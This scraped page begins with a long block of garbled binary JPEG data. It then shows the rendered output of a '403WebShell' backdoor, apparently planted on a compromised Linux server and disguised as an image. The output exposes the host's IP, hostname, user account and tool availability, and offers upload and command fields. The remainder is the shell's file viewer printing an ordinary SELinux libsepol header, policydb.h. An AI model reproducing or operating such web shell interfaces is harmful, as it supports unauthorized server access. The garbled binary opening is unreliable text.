JFIFXX    $.' ",#(7),01444'9=82<.342  2!!22222222222222222222222222222222222222222222222222"4 ,PG"Z_4˷kjزZ,F+_z,© zh6٨icfu#ډb_N?wQ5-~I8TK<5oIv-k_U_~bMdӜUHh?]EwQk{_}qFW7HTՑYF?_'ϔ_Ջt=||I 6έ"D/[k9Y8ds|\Ҿp6Ҵ].6znopM[mei$[soᘨ˸ nɜG-ĨUycP3.DBli;hjx7Z^NhN3u{:jx힞#M&jL P@_ P&o89@Sz6t7#Oߋ s}YfTlmrZ)'Nk۞pw\Tȯ?8`Oi{wﭹW[r Q4F׊3m&L=h3z~#\l :F,j@ ʱwQT8"kJO6֚l}R>ډK]y&p}b;N1mr$|7>e@BTM*-iHgD) Em|ؘbҗaҾt4oG*oCNrPQ@z,|?W[0:n,jWiEW$~/hp\?{(0+Y8rΟ+>S-SVN;}s?. w9˟<Mq4Wv'{)01mBVW[8/< %wT^5b)iM pgN&ݝVO~qu9 !J27$O-! :%H ـyΠM=t{!S oK8txA& j0 vF Y|y ~6@c1vOpIg4lODL Rcj_uX63?nkWyf;^*B @~a`Eu+6L.ü>}y}_O6͐:YrGXkGl^w~㒶syIu! W XN7BVO!X2wvGRfT#t/?%8^WaTGcLMI(J1~8?aT ]ASE(*E} 2#I/׍qz^t̔bYz4xt){ OH+(EA&NXTo"XC')}Jzp ~5}^+6wcQ|LpdH}(.|kc4^"Z?ȕ a<L!039C EuCFEwç ;n?*oB8bʝ'#RqfM}7]s2tcS{\icTx;\7KPʇ Z O-~c>"?PEO8@8GQgaՎ󁶠䧘_%#r>1zaebqcPѵn#L =׀t L7`VA{C:ge@w1 Xp3c3ġpM"'-@n4fGB3DJ8[JoߐgK)ƛ$ 83+ 6ʻ SkI*KZlT _`?KQKdB`s}>`*>,*@JdoF*弝O}ks]yߘc1GV<=776qPTtXԀ!9*44Tހ3XΛex46YD  BdemDa\_l,G/֌7Y](xTt^%GE4}bTڹ;Y)BQu>J/J ⮶.XԄjݳ+Ed r5_D1 o Bx΢#<W8R6@gM. drD>(otU@x=~v2 ӣdoBd3eO6㣷ݜ66YQz`S{\P~z m5{J/L1xO\ZFu>ck#&:`$ai>2ΔloF[hlEܺΠk:)` $[69kOw\|8}ބ:񶐕IA1/=2[,!.}gN#ub ~݊}34qdELc$"[qU硬g^%B zrpJru%v\h1Yne`ǥ:gpQM~^Xi `S:V29.PV?Bk AEvw%_9CQwKekPؠ\;Io d{ ߞoc1eP\ `E=@KIRYK2NPlLɀ)&eB+ь( JTx_?EZ }@ 6U뙢طzdWIn` D噥[uV"G&Ú2g}&m?ċ"Om# {ON"SXNeysQ@FnVgdX~nj]J58up~.`r\O,ư0oS _Ml4kv\JSdxSW<AeIX$Iw:Sy›R9Q[,5;@]%u@ *rolbI  +%m:͇ZVủθau,RW33 dJeTYE.Mϧ-oj3+yy^cVO9NV\nd1 !͕_)av;թMlWR1)ElP;yوÏu 3k5Pr6<⒲l!˞*u־n!l:UNW %Chx8vL'X@*)̮ˍ D-M+JUkvK+x8cY?Ԡ~3mo|u@[XeYC\Kpx8oCC&N~3-H MXsu<`~"WL$8ξ3a)|:@m\^`@ҷ)5p+6p%i)P Mngc#0AruzRL+xSS?ʮ}()#tmˇ!0}}y$6Lt;$ʳ{^6{v6ķܰgVcnn ~zx«,2u?cE+ȘH؎%Za)X>uWTzNyosFQƤ$*&LLXL)1" LeOɟ9=:tZcŽY?ӭVwv~,Yrۗ|yGaFC.+ v1fήJ]STBn5sW}y$~z'c 8  ,! pVNSNNqy8z˱A4*'2n<s^ǧ˭PJޮɏUGLJ*#i}K%,)[z21z ?Nin1?TIR#m-1lA`fT5+ܐcq՝ʐ,3f2Uեmab#ŠdQy>\)SLYw#.ʑf ,"+w~N'cO3FN<)j&,- љ֊_zSTǦw>?nU仆Ve0$CdrP m׈eXmVu L.bֹ [Դaզ*\y8Է:Ez\0KqC b̘cөQ=0YsNS.3.Oo:#v7[#߫ 5܎LEr49nCOWlG^0k%;YߝZǓ:S#|}y,/kLd TA(AI$+I3;Y*Z}|ӧOdv..#:nf>>ȶITX 8y"dR|)0=n46ⲑ+ra ~]R̲c?6(q;5% |uj~z8R=XIV=|{vGj\gcqz؋%Mߍ1y#@f^^>N#x#۹6Y~?dfPO{P4Vu1E1J *|%JN`eWuzk M6q t[ gGvWIGu_ft5j"Y:Tɐ*; e54q$C2d} _SL#mYpO.C;cHi#֩%+) ӍƲVSYźg |tj38r|V1#;.SQA[S#`n+$$I P\[@s(EDzP])8G#0B[ىXIIq<9~[Z멜Z⊔IWU&A>P~#dp]9 "cP Md?٥Ifتuk/F9c*9Ǎ:ØFzn*@|Iށ9N3{'['ͬҲ4#}!V Fu,,mTIkv C7vB6kT91*l '~ƞFlU'M ][ΩũJ_{iIn$L jOdxkza۪#EClx˘oVɞljr)/,߬hL#^Lф,íMƁe̩NBLiLq}(q6IçJ$WE$:=#(KBzђ xlx?>Պ+>W,Ly!_DŌlQ![ SJ1ƐY}b,+Loxɓ)=yoh@꥟/Iѭ=Py9 ۍYӘe+pJnϱ?V\SO%(t =?MR[Șd/ nlB7j !;ӥ/[-A>dNsLj ,ɪv=1c.SQO3UƀܽE̻9GϷD7(}Ävӌ\y_0[w <΍>a_[0+LF.޺f>oNTq;y\bՃyjH<|q-eɏ_?_9+PHp$[uxK wMwNی'$Y2=qKBP~Yul:[<F12O5=d]Ysw:ϮEj,_QXz`H1,#II dwrP˂@ZJVy$\y{}^~[:NߌUOdؾe${p>G3cĖlʌ ת[`ϱ-WdgIig2 }s ؤ(%#sS@~3XnRG~\jc3vӍLM[JBTs3}jNʖW;7ç?=XF=-=qߚ#='c7ڑWI(O+=:uxqe2zi+kuGR0&eniT^J~\jyp'dtGsO39* b#Ɋ p[BwsT>d4ۧsnvnU_~,vƜJ1s QIz)(lv8MU=;56Gs#KMP=LvyGd}VwWBF'à ?MHUg2 !p7Qjڴ=ju JnA suMeƆҔ!)'8Ϣٔޝ(Vpצ֖d=ICJǠ{qkԭ߸i@Ku|p=..*+xz[Aqġ#s2aƊRR)*HRsi~a &fMP-KL@ZXy'x{}Zm+:)) IJ-iu ܒH'L(7yGӜq j 6ߌg1go,kرtY?W,pefOQS!K۟cҒA|սj>=⬒˧L[ ߿2JaB~Ru:Q] 0H~]7ƼI(}cq 'ήETq?fabӥvr )o-Q_'ᴎoK;Vo%~OK *bf:-ťIR`B5!RB@ï u ̯e\_U_ gES3QTaxU<~c?*#]MW,[8Oax]1bC|踤Plw5V%){t<d50iXSUm:Z┵i"1^B-PhJ&)O*DcWvM)}Pܗ-q\mmζZ-l@}aE6F@&Sg@ݚM ȹ 4#p\HdYDoH"\..RBHz_/5˘6KhJRPmƶim3,#ccoqa)*PtRmk7xDE\Y閣_X<~)c[[BP6YqS0%_;Àv~| VS؇ 'O0F0\U-d@7SJ*z3nyPOm~P3|Yʉr#CSN@ ƮRN)r"C:: #qbY. 6[2K2uǦHYRQMV G$Q+.>nNHq^ qmMVD+-#*U̒ p욳u:IBmPV@Or[b= 1UE_NmyKbNOU}the`|6֮P>\2PVIDiPO;9rmAHGWS]J*_G+kP2KaZH'KxWMZ%OYDRc+o?qGhmdSoh\D|:WUAQc yTq~^H/#pCZTI1ӏT4"ČZ}`w#*,ʹ 0i課Om*da^gJ݅{le9uF#Tֲ̲ٞC"qߍ ոޑo#XZTp@ o8(jdxw],f`~|,s^f1t|m򸄭/ctr5s79Q4H1꠲BB@l9@C+wpxu£Yc9?`@#omHs2)=2.ljg9$YS%*LRY7Z,*=䷘$armoϰUW.|rufIGwtZwo~5 YյhO+=8fF)W7L9lM̘·Y֘YLf큹pRF99.A "wz=E\Z'a 2Ǚ#;'}G*l^"q+2FQ hjkŦ${ޮ-T٭cf|3#~RJt$b(R(rdx >U b&9,>%E\ Άe$'q't*אެb-|dSBOO$R+H)܎K1m`;J2Y~9Og8=vqD`K[F)k[1m޼cn]skz$@)!I x՝"v9=ZA=`Ɠi :E)`7vI}dYI_ o:obo 3Q&D&2= Ά;>hy.*ⅥSӬ+q&j|UƧ}J0WW< ۋS)jQRjƯrN)Gű4Ѷ(S)Ǣ8iW52No˓ ۍ%5brOnL;n\G=^UdI8$&h'+(cȁ߫klS^cƗjԌEꭔgFȒ@}O*;evWVYJ\]X'5ղkFb 6Ro՜mi Ni>J?lPmU}>_Z&KKqrIDՉ~q3fL:Se>E-G{L6pe,8QIhaXaUA'ʂs+טIjP-y8ۈZ?J$WP Rs]|l(ԓsƊio(S0Y 8T97.WiLc~dxcE|2!XKƘਫ਼$((6~|d9u+qd^389Y6L.I?iIq9)O/뚅OXXVZF[یgQLK1RҖr@v#XlFНyS87kF!AsM^rkpjPDyS$Nqnxҍ!Uf!ehi2m`YI9r6 TFC}/y^Η5d'9A-J>{_l+`A['յϛ#w:݅%X}&PStQ"-\縵/$ƗhXb*yBS;Wջ_mcvt?2}1;qSdd~u:2k52R~z+|HE!)Ǟl7`0<,2*Hl-x^'_TVgZA'j ^2ΪN7t?w x1fIzC-ȖK^q;-WDvT78Z hK(P:Q- 8nZ܃e貾<1YT<,"6{/ ?͟|1:#gW>$dJdB=jf[%rE^il:BxSּ1հ,=*7 fcG#q eh?27,!7x6nLC4x},GeǝtC.vS F43zz\;QYC,6~;RYS/6|25vTimlv& nRh^ejRLGf? ۉҬܦƩ|Ȱ>3!viʯ>vオX3e_1zKȗ\qHS,EW[㺨uch⍸O}a>q6n6N6qN ! 1AQaq0@"2BRb#Pr3C`Scst$4D%Td ?Na3mCwxAmqmm$4n淿t'C"wzU=D\R+wp+YT&պ@ƃ3ޯ?AﶂaŘ@-Q=9Dռѻ@MVP܅G5fY6# ?0UQ,IX(6ڵ[DIMNލc&υj\XR|,4 jThAe^db#$]wOӪ1y%LYm뭛CUƃߜ}Cy1XνmF8jI]HۺиE@Ii;r8ӭVFՇ| &?3|xBMuSGe=Ӕ#BE5GY!z_eqр/W>|-Ci߇t1ޯќdR3ug=0 5[?#͏qcfH{ ?u=??ǯ}ZzhmΔBFTWPxs}G93 )gGR<>r h$'nchPBjJҧH -N1N?~}-q!=_2hcMlvY%UE@|vM2.Y[|y"EïKZF,ɯ?,q?vM 80jx";9vk+ ֧ ȺU?%vcVmA6Qg^MA}3nl QRNl8kkn'(M7m9وq%ޟ*h$Zk"$9: ?U8Sl,,|ɒxH(ѷGn/Q4PG%Ա8N! &7;eKM749R/%lc>x;>C:th?aKXbheᜋ^$Iհ hr7%F$EFdt5+(M6tÜUU|zW=aTsTgdqPQb'm1{|YXNb P~F^F:k6"j! Ir`1&-$Bevk:y#ywI0x=D4tUPZHڠ底taP6b>xaQ# WeFŮNjpJ* mQN*I-*ȩFg3 5Vʊɮa5FO@{NX?H]31Ri_uѕ 0 F~:60p͈SqX#a5>`o&+<2D: ڝ$nP*)N|yEjF5ټeihyZ >kbHavh-#!Po=@k̆IEN@}Ll?jO߭ʞQ|A07xwt!xfI2?Z<ץTcUj]陎Ltl }5ϓ$,Omˊ;@OjEj(ا,LXLOЦ90O .anA7j4 W_ٓzWjcBy՗+EM)dNg6y1_xp$Lv:9"zpʙ$^JԼ*ϭo=xLj6Ju82AH3$ٕ@=Vv]'qEz;I˼)=ɯx /W(Vp$ mu񶤑OqˎTr㠚xsrGCbypG1ߠw e8$⿄/M{*}W]˷.CK\ުx/$WPwr |i&}{X >$-l?-zglΆ(FhvS*b߲ڡn,|)mrH[a3ר[13o_U3TC$(=)0kgP u^=4 WYCҸ:vQרXàtkm,t*^,}D* "(I9R>``[~Q]#afi6l86:,ssN6j"A4IuQ6E,GnHzSHOuk5$I4ؤQ9@CwpBGv[]uOv0I4\yQѸ~>Z8Taqޣ;za/SI:ܫ_|>=Z8:SUIJ"IY8%b8H:QO6;7ISJҌAά3>cE+&jf$eC+z;V rʺmyeaQf&6ND.:NTvm<- uǝ\MvZYNNT-A>jr!SnO 13Ns%3D@`ܟ 1^c< aɽ̲Xë#w|ycW=9I*H8p^(4՗karOcWtO\ƍR8'KIQ?5>[}yUײ -h=% qThG2)"ו3]!kB*pFDlA,eEiHfPs5H:Փ~H0DتDIhF3c2E9H5zԑʚiX=:mxghd(v׊9iSOd@0ڽ:p5h-t&Xqӕ,ie|7A2O%PEhtjY1wЃ!  ࢽMy7\a@ţJ 4ȻF@o̒?4wx)]P~u57X 9^ܩU;Iꭆ 5 eK27({|Y׎ V\"Z1 Z}(Ǝ"1S_vE30>p; ΝD%xW?W?vo^Vidr[/&>~`9Why;R ;;ɮT?r$g1KACcKl:'3 cﳯ*"t8~l)m+U,z`(>yJ?h>]vЍG*{`;y]IT ;cNUfo¾h/$|NS1S"HVT4uhǜ]v;5͠x'C\SBplh}N ABx%ޭl/Twʽ]D=Kžr㻠l4SO?=k M: cCa#ha)ѐxcsgPiG{+xQI= zԫ+ 8"kñj=|c yCF/*9жh{ ?4o kmQNx;Y4膚aw?6>e]Qr:g,i"ԩA*M7qB?ӕFhV25r[7 Y }LR}*sg+xr2U=*'WSZDW]WǞ<叓{$9Ou4y90-1'*D`c^o?(9uݐ'PI& fJݮ:wSjfP1F:X H9dԯ˝[_54 }*;@ܨ ðynT?ןd#4rGͨH1|-#MrS3G3).᧏3vz֑r$G"`j 1tx0<ƆWh6y6,œGagAyb)hDß_mü gG;evݝnQ C-*oyaMI><]obD":GA-\%LT8c)+y76oQ#*{(F⽕y=rW\p۩cA^e6KʐcVf5$'->ՉN"F"UQ@fGb~#&M=8טJNu9D[̤so~ G9TtW^g5y$bY'سǴ=U-2 #MCt(i lj@Q 5̣i*OsxKf}\M{EV{υƇ);HIfeLȣr2>WIȂ6ik 5YOxȺ>Yf5'|H+98pjn.OyjY~iw'l;s2Y:'lgꥴ)o#'SaaKZ m}`169n"xI *+ }FP"l45'ZgE8?[X7(.Q-*ތL@̲v.5[=t\+CNܛ,gSQnH}*FG16&:t4ُ"Ạ$b |#rsaT ]ӽDP7ո0y)e$ٕvIh'QEAm*HRI=: 4牢) %_iNݧl] NtGHL ɱg<1V,J~ٹ"KQ 9HS9?@kr;we݁]I!{ @G["`J:n]{cAEVʆ#U96j#Ym\qe4hB7Cdv\MNgmAyQL4uLjj9#44tl^}LnR!t±]rh6ٍ>yҏNfU  Fm@8}/ujb9he:AyծwGpΧh5l}3p468)Udc;Us/֔YX1O2uqs`hwgr~{ RmhN؎*q 42*th>#E#HvOq}6e\,Wk#Xb>p}դ3T5†6[@Py*n|'f֧>lư΂̺SU'*qp_SM 'c6m ySʨ;MrƋmKxo,GmPAG:iw9}M(^V$ǒѽ9| aJSQarB;}ٻ֢2%Uc#gNaݕ'v[OY'3L3;,p]@S{lsX'cjwk'a.}}& dP*bK=ɍ!;3ngΊUߴmt'*{,=SzfD Ako~Gaoq_mi}#mPXhύmxǍ΂巿zfQc|kc?WY$_Lvl߶c`?ljݲˏ!V6UЂ(A4y)HpZ_x>eR$/`^'3qˏ-&Q=?CFVR DfV9{8gnh(P"6[D< E~0<@`G6Hгcc cK.5DdB`?XQ2ٿyqo&+1^ DW0ꊩG#QnL3c/x 11[yxპCWCcUĨ80me4.{muI=f0QRls9f9~fǨa"@8ȁQ#cicG$Gr/$W(WV"m7[mAmboD j۳ l^kh׽ # iXnveTka^Y4BNĕ0 !01@Q"2AaPq3BR?@4QT3,㺠W[=JKϞ2r^7vc:9 EߴwS#dIxu:Hp9E! V 2;73|F9Y*ʬFDu&y؟^EAA(ɩ^GV:ݜDy`Jr29ܾ㝉[E;FzxYGUeYC v-txIsםĘqEb+P\ :>iC';k|zرny]#ǿbQw(r|ӹs[D2v-%@;8<a[\o[ϧwI!*0krs)[J9^ʜp1) "/_>o<1AEy^C`x1'ܣnps`lfQ):lb>MejH^?kl3(z:1ŠK&?Q~{ٺhy/[V|6}KbXmn[-75q94dmc^h X5G-}دBޟ |rtMV+]c?-#ڛ^ǂ}LkrOu>-Dry D?:ޞUǜ7V?瓮"#rչģVR;n/_ ؉vݶe5db9/O009G5nWJpA*r9>1.[tsFnQ V 77R]ɫ8_0<՜IFu(v4Fk3E)N:yڮeP`1}$WSJSQNjٺ޵#lј(5=5lǏmoWv-1v,Wmn߀$x_DȬ0¤#QR[Vkzmw"9ZG7'[=Qj8R?zf\a=OU*oBA|G254 p.w7  &ξxGHp B%$gtЏ򤵍zHNuЯ-'40;_3 !01"@AQa2Pq#3BR?ʩcaen^8F<7;EA{EÖ1U/#d1an.1ě0ʾRh|RAo3m3 % 28Q yφHTo7lW>#i`qca m,B-j݋'mR1Ήt>Vps0IbIC.1Rea]H64B>o]($Bma!=?B KǾ+Ծ"nK*+[T#{EJSQs5:U\wĐf3܆&)IԆwE TlrTf6Q|Rh:[K zc֧GC%\_a84HcObiؖV7H )*ģK~Xhչ04?0 E<}3#u? |gS6ꊤ|I#Hڛ աwX97Ŀ%SLy6č|Fa 8b$sקhb9RAu7˨pČ_\*w묦F 4D~f|("mNKiS>$d7SlA/²SL|6N}S˯g]6; #. 403WebShell
403Webshell
Server IP : 173.199.190.172  /  Your IP : 216.73.216.48
Web Server : Apache
System : Linux chs1.nescrow.com.ng 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : oysipaoygov ( 1026)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/include/sepol/policydb/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /usr/include/sepol/policydb/policydb.h
/* Author : Stephen Smalley, <sds@epoch.ncsc.mil> */

/*
 * Updated: Joshua Brindle <jbrindle@tresys.com>
 *	    Karl MacMillan <kmacmillan@tresys.com>
 *	    Jason Tang <jtang@tresys.com>
 *	    
 *	Module support
 *
 * Updated: Trusted Computer Solutions, Inc. <dgoeddel@trustedcs.com>
 *
 *	Support for enhanced MLS infrastructure.
 *
 * Updated: Frank Mayer <mayerf@tresys.com> and Karl MacMillan <kmacmillan@tresys.com>
 *
 * 	Added conditional policy language extensions
 *
 * Updated: Red Hat, Inc.  James Morris <jmorris@redhat.com>
 *
 *      Fine-grained netlink support
 *      IPv6 support
 *      Code cleanup
 *
 * Copyright (C) 2004-2005 Trusted Computer Solutions, Inc.
 * Copyright (C) 2003 - 2004 Tresys Technology, LLC
 * Copyright (C) 2003 - 2004 Red Hat, Inc.
 * Copyright (C) 2017 Mellanox Techonolgies Inc.
 *
 *  This library is free software; you can redistribute it and/or
 *  modify it under the terms of the GNU Lesser General Public
 *  License as published by the Free Software Foundation; either
 *  version 2.1 of the License, or (at your option) any later version.
 *
 *  This library is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 *  Lesser General Public License for more details.
 *
 *  You should have received a copy of the GNU Lesser General Public
 *  License along with this library; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 */

/* FLASK */

/*
 * A policy database (policydb) specifies the 
 * configuration data for the security policy.
 */

#ifndef _SEPOL_POLICYDB_POLICYDB_H_
#define _SEPOL_POLICYDB_POLICYDB_H_

#include <stdio.h>
#include <stddef.h>

#include <sepol/policydb.h>

#include <sepol/policydb/flask_types.h>
#include <sepol/policydb/symtab.h>
#include <sepol/policydb/avtab.h>
#include <sepol/policydb/context.h>
#include <sepol/policydb/constraint.h>
#include <sepol/policydb/sidtab.h>
#include <sys/cdefs.h>

#define ERRMSG_LEN 1024

#define POLICYDB_SUCCESS      0
#define POLICYDB_ERROR       -1
#define POLICYDB_UNSUPPORTED -2

__BEGIN_DECLS

#define IB_DEVICE_NAME_MAX 64

/*
 * A datum type is defined for each kind of symbol 
 * in the configuration data:  individual permissions, 
 * common prefixes for access vectors, classes,
 * users, roles, types, sensitivities, categories, etc.
 */

/* type set preserves data needed by modules such as *, ~ and attributes */
typedef struct type_set {
	ebitmap_t types;
	ebitmap_t negset;
#define TYPE_STAR 1
#define TYPE_COMP 2
	uint32_t flags;
} type_set_t;

typedef struct role_set {
	ebitmap_t roles;
#define ROLE_STAR 1
#define ROLE_COMP 2
	uint32_t flags;
} role_set_t;

/* Permission attributes */
typedef struct perm_datum {
	symtab_datum_t s;
} perm_datum_t;

/* Attributes of a common prefix for access vectors */
typedef struct common_datum {
	symtab_datum_t s;
	symtab_t permissions;	/* common permissions */
} common_datum_t;

/* Class attributes */
typedef struct class_datum {
	symtab_datum_t s;
	char *comkey;		/* common name */
	common_datum_t *comdatum;	/* common datum */
	symtab_t permissions;	/* class-specific permission symbol table */
	constraint_node_t *constraints;	/* constraints on class permissions */
	constraint_node_t *validatetrans;	/* special transition rules */
/* Options how a new object user and role should be decided */
#define DEFAULT_SOURCE		1
#define DEFAULT_TARGET		2
	char default_user;
	char default_role;
	char default_type;
/* Options how a new object range should be decided */
#define DEFAULT_SOURCE_LOW	1
#define DEFAULT_SOURCE_HIGH	2
#define DEFAULT_SOURCE_LOW_HIGH	3
#define DEFAULT_TARGET_LOW	4
#define DEFAULT_TARGET_HIGH	5
#define DEFAULT_TARGET_LOW_HIGH	6
	char default_range;
} class_datum_t;

/* Role attributes */
typedef struct role_datum {
	symtab_datum_t s;
	ebitmap_t dominates;	/* set of roles dominated by this role */
	type_set_t types;	/* set of authorized types for role */
	ebitmap_t cache;	/* This is an expanded set used for context validation during parsing */
	uint32_t bounds;	/* bounds role, if exist */
#define ROLE_ROLE 0		/* regular role in kernel policies */
#define ROLE_ATTRIB 1		/* attribute */
	uint32_t flavor;
	ebitmap_t roles;	/* roles with this attribute */
} role_datum_t;

typedef struct role_trans {
	uint32_t role;		/* current role */
	uint32_t type;		/* program executable type, or new object type */
	uint32_t tclass;	/* process class, or new object class */
	uint32_t new_role;	/* new role */
	struct role_trans *next;
} role_trans_t;

typedef struct role_allow {
	uint32_t role;		/* current role */
	uint32_t new_role;	/* new role */
	struct role_allow *next;
} role_allow_t;

/* filename_trans rules */
typedef struct filename_trans {
	uint32_t stype;
	uint32_t ttype;
	uint32_t tclass;
	char *name;
	uint32_t otype;
	struct filename_trans *next;
} filename_trans_t;

/* Type attributes */
typedef struct type_datum {
	symtab_datum_t s;
	uint32_t primary;	/* primary name? can be set to primary value if below is TYPE_ */
#define TYPE_TYPE 0		/* regular type or alias in kernel policies */
#define TYPE_ATTRIB 1		/* attribute */
#define TYPE_ALIAS 2		/* alias in modular policy */
	uint32_t flavor;
	ebitmap_t types;	/* types with this attribute */
#define TYPE_FLAGS_PERMISSIVE	0x01
	uint32_t flags;
	uint32_t bounds;	/* bounds type, if exist */
} type_datum_t;

/*
 * Properties of type_datum
 * available on the policy version >= (MOD_)POLICYDB_VERSION_BOUNDARY
 */
#define TYPEDATUM_PROPERTY_PRIMARY	0x0001
#define TYPEDATUM_PROPERTY_ATTRIBUTE	0x0002
#define TYPEDATUM_PROPERTY_ALIAS	0x0004	/* userspace only */
#define TYPEDATUM_PROPERTY_PERMISSIVE	0x0008	/* userspace only */

/* User attributes */
typedef struct user_datum {
	symtab_datum_t s;
	role_set_t roles;	/* set of authorized roles for user */
	mls_semantic_range_t range;	/* MLS range (min. - max.) for user */
	mls_semantic_level_t dfltlevel;	/* default login MLS level for user */
	ebitmap_t cache;	/* This is an expanded set used for context validation during parsing */
	mls_range_t exp_range;     /* expanded range used for validation */
	mls_level_t exp_dfltlevel; /* expanded range used for validation */
	uint32_t bounds;	/* bounds user, if exist */
} user_datum_t;

/* Sensitivity attributes */
typedef struct level_datum {
	mls_level_t *level;	/* sensitivity and associated categories */
	unsigned char isalias;	/* is this sensitivity an alias for another? */
	unsigned char defined;
} level_datum_t;

/* Category attributes */
typedef struct cat_datum {
	symtab_datum_t s;
	unsigned char isalias;	/* is this category an alias for another? */
} cat_datum_t;

typedef struct range_trans {
	uint32_t source_type;
	uint32_t target_type;
	uint32_t target_class;
	mls_range_t target_range;
	struct range_trans *next;
} range_trans_t;

/* Boolean data type */
typedef struct cond_bool_datum {
	symtab_datum_t s;
	int state;
#define COND_BOOL_FLAGS_TUNABLE	0x01	/* is this a tunable? */
	uint32_t flags;
} cond_bool_datum_t;

struct cond_node;

typedef struct cond_node cond_list_t;
struct cond_av_list;

typedef struct class_perm_node {
	uint32_t tclass;
	uint32_t data;		/* permissions or new type */
	struct class_perm_node *next;
} class_perm_node_t;

#define xperm_test(x, p) (1 & (p[x >> 5] >> (x & 0x1f)))
#define xperm_set(x, p) (p[x >> 5] |= (1 << (x & 0x1f)))
#define xperm_clear(x, p) (p[x >> 5] &= ~(1 << (x & 0x1f)))
#define EXTENDED_PERMS_LEN 8

typedef struct av_extended_perms {
#define AVRULE_XPERMS_IOCTLFUNCTION	0x01
#define AVRULE_XPERMS_IOCTLDRIVER	0x02
	uint8_t specified;
	uint8_t driver;
	/* 256 bits of permissions */
	uint32_t perms[EXTENDED_PERMS_LEN];
} av_extended_perms_t;

typedef struct avrule {
/* these typedefs are almost exactly the same as those in avtab.h - they are
 * here because of the need to include neverallow and dontaudit messages */
#define AVRULE_ALLOWED			0x0001
#define AVRULE_AUDITALLOW		0x0002
#define AVRULE_AUDITDENY		0x0004
#define AVRULE_DONTAUDIT		0x0008
#define AVRULE_NEVERALLOW		0x0080
#define AVRULE_AV         (AVRULE_ALLOWED | AVRULE_AUDITALLOW | AVRULE_AUDITDENY | AVRULE_DONTAUDIT | AVRULE_NEVERALLOW)
#define AVRULE_TRANSITION		0x0010
#define AVRULE_MEMBER			0x0020
#define AVRULE_CHANGE			0x0040
#define AVRULE_TYPE       (AVRULE_TRANSITION | AVRULE_MEMBER | AVRULE_CHANGE)
#define AVRULE_XPERMS_ALLOWED 		0x0100
#define AVRULE_XPERMS_AUDITALLOW	0x0200
#define AVRULE_XPERMS_DONTAUDIT		0x0400
#define AVRULE_XPERMS_NEVERALLOW	0x0800
#define AVRULE_XPERMS	(AVRULE_XPERMS_ALLOWED | AVRULE_XPERMS_AUDITALLOW | \
				AVRULE_XPERMS_DONTAUDIT | AVRULE_XPERMS_NEVERALLOW)
	uint32_t specified;
#define RULE_SELF 1
	uint32_t flags;
	type_set_t stypes;
	type_set_t ttypes;
	class_perm_node_t *perms;
	av_extended_perms_t *xperms;
	unsigned long line;	/* line number from policy.conf where
				 * this rule originated  */
	/* source file name and line number (e.g. .te file) */
	char *source_filename;
	unsigned long source_line;
	struct avrule *next;
} avrule_t;

typedef struct role_trans_rule {
	role_set_t roles;	/* current role */
	type_set_t types;	/* program executable type, or new object type */
	ebitmap_t classes;	/* process class, or new object class */
	uint32_t new_role;	/* new role */
	struct role_trans_rule *next;
} role_trans_rule_t;

typedef struct role_allow_rule {
	role_set_t roles;	/* current role */
	role_set_t new_roles;	/* new roles */
	struct role_allow_rule *next;
} role_allow_rule_t;

typedef struct filename_trans_rule {
	type_set_t stypes;
	type_set_t ttypes;
	uint32_t tclass;
	char *name;
	uint32_t otype;	/* new type */
	struct filename_trans_rule *next;
} filename_trans_rule_t;

typedef struct range_trans_rule {
	type_set_t stypes;
	type_set_t ttypes;
	ebitmap_t tclasses;
	mls_semantic_range_t trange;
	struct range_trans_rule *next;
} range_trans_rule_t;

/*
 * The configuration data includes security contexts for 
 * initial SIDs, unlabeled file systems, TCP and UDP port numbers, 
 * network interfaces, and nodes.  This structure stores the
 * relevant data for one such entry.  Entries of the same kind
 * (e.g. all initial SIDs) are linked together into a list.
 */
typedef struct ocontext {
	union {
		char *name;	/* name of initial SID, fs, netif, fstype, path */
		struct {
			uint8_t protocol;
			uint16_t low_port;
			uint16_t high_port;
		} port;		/* TCP or UDP port information */
		struct {
			uint32_t addr; /* network order */
			uint32_t mask; /* network order */
		} node;		/* node information */
		struct {
			uint32_t addr[4]; /* network order */
			uint32_t mask[4]; /* network order */
		} node6;	/* IPv6 node information */
		uint32_t device;
		uint16_t pirq;
		struct {
			uint64_t low_iomem;
			uint64_t high_iomem;
		} iomem;
		struct {
			uint32_t low_ioport;
			uint32_t high_ioport;
		} ioport;
		struct {
			uint64_t subnet_prefix;
			uint16_t low_pkey;
			uint16_t high_pkey;
		} ibpkey;
		struct {
			char *dev_name;
			uint8_t port;
		} ibendport;
	} u;
	union {
		uint32_t sclass;	/* security class for genfs */
		uint32_t behavior;	/* labeling behavior for fs_use */
	} v;
	context_struct_t context[2];	/* security context(s) */
	sepol_security_id_t sid[2];	/* SID(s) */
	struct ocontext *next;
} ocontext_t;

typedef struct genfs {
	char *fstype;
	struct ocontext *head;
	struct genfs *next;
} genfs_t;

/* symbol table array indices */
#define SYM_COMMONS 0
#define SYM_CLASSES 1
#define SYM_ROLES   2
#define SYM_TYPES   3
#define SYM_USERS   4
#define SYM_BOOLS   5
#define SYM_LEVELS  6
#define SYM_CATS    7
#define SYM_NUM     8

/* object context array indices */
#define OCON_ISID  0	/* initial SIDs */
#define OCON_FS    1	/* unlabeled file systems */
#define OCON_PORT  2	/* TCP and UDP port numbers */
#define OCON_NETIF 3	/* network interfaces */
#define OCON_NODE  4	/* nodes */
#define OCON_FSUSE 5	/* fs_use */
#define OCON_NODE6 6	/* IPv6 nodes */
#define OCON_IBPKEY 7	/* Infiniband PKEY */
#define OCON_IBENDPORT 8	/* Infiniband End Port */

/* object context array indices for Xen */
#define OCON_XEN_ISID  	    0    /* initial SIDs */
#define OCON_XEN_PIRQ       1    /* physical irqs */
#define OCON_XEN_IOPORT     2    /* io ports */
#define OCON_XEN_IOMEM	    3    /* io memory */
#define OCON_XEN_PCIDEVICE  4    /* pci devices */
#define OCON_XEN_DEVICETREE 5    /* device tree node */

/* OCON_NUM needs to be the largest index in any platform's ocontext array */
#define OCON_NUM   9

